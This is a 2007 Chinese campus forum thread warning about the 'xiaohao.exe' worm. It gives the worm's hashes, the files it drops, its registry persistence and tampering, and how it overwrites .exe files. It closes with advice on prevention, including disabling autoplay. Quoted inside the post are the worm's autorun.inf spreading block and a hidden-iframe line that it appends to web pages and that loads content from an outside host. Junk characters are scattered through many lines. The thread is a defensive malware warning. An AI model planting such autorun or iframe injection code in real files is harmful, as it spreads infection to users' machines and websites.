诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 374|回复: 2

警惕恶性蠕虫病毒"xiaohao.exe"(浩字病毒)!

[复制链接]
发表于 2007-9-16 09:33:42 | 显示全部楼层 |阅读模式
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe0 V5 o$ k/ Q/ Q* E1 j
Size: 12288 bytes7 F$ K- o0 c8 c( S
File Version: 1, 0, 0, 1
' |' K) r4 {  q5 f: g5 BModified: 2007年8月14日, 21:03:22
  b, K0 Q/ O1 T. c8 n0 aMD5: B50ED06B61CDCF060D0136784999E50C( m5 _. e1 O* S% |# T1 O+ a
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
8 J* {+ d8 J$ n; cCRC32: 5CC1E47A
; _7 [4 M" Q7 M+ i# T0 k: A加壳方式:UPX 1 U5 Y) Q8 a4 C( V* l
病毒运行后:1 }; S- }" b3 Q- X; ^
1.生成如下文件:7 F8 h: F. C1 a% b' g) v
%SystemRoot%\system32\exloroe.exe, G8 j7 K' J7 t, V$ r
每个分区下生成一个xiaohao.exe 和autorun.inf; o* A, R  w$ ]6 B2 p
autorun.inf内容
- D" W% A) ^- U( O5 b/ a6 W[Autorun]
; g; ~$ a" z; ~" H3 K- b+ {open=Xiaohao.exe& c% m- \8 L) w% m! B
shellexecute=Xiaohao.exe* {2 @$ r* y0 F7 c! n2 |/ x4 |" G
shell\Auto\command=Xiaohao.exe
+ Z1 \, Z+ |$ V7 `8 H8 U% y2.添加注册表项目
0 ~& |/ q$ c+ s- @: J. ~HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
4 C0 O& e( Z9 Z6 `  N! I" S指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的
5 N0 g7 u% q7 u& W  f2 m3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000$ S; v+ G; ]% v. u5 o5 D- H3 Y
破坏显示隐藏文件
/ I: x; q* j0 [9 a/ T删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2) Z" K5 J6 [+ \4 M8 Z9 O: |* c9 G* d; D
从而删除开始菜单中所有的快捷方式0 S1 K: J4 L, g
4.感染文件" n  A; D8 {( u8 c8 X' m! ?, P
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的
8 Z5 ?; a) ]* I8 jexe无法修复$ a0 f+ s3 J9 H& B$ H
从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码+ x6 h. c& g7 \# m; ^
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
& q$ \6 w! h6 K. Y6 A' h: m所有感染的文件的文件名记录在C:\Jilu.txt里面5 L+ D, r( {# u8 t6 N$ [; T
并将所有未能感染的文件属性变为隐藏$ c! ^+ x, ^- g) u. U
5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”+ |; J  I* ^; O6 V0 G0 ^& N
6.系统时间改为2005年1月17日4 O, i1 k7 J- y  q  c, S. m" L7 W: h
病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。
0 l7 _  k- C' v9 F  D/ D由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败
3 D* F2 K; T' s& S# G" t; t如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉) K  d; X- |# ~1 [% P+ N+ q& v6 Z
希望大家注意如下几点防范此类病毒& w' K& v$ p* s& `# {5 ^( [) R
1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)- Y% h& O: N. u" ?
2.及时升级杀毒软件,防火墙,一定打全系统补丁9 t) a# ]! G& g+ l' ^
3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可
发表于 2007-9-16 09:58:34 | 显示全部楼层
希望偶不要中招
 楼主| 发表于 2007-9-16 20:03:07 | 显示全部楼层
蠕虫别乱接邮件乱载东西应该就没事喽。。。。:m42
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|诚毅小家 ( 小家社区工作室 闽ICP备05007965号 )

GMT+8, 2024-11-22 01:49 , Processed in 0.086745 second(s), 19 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表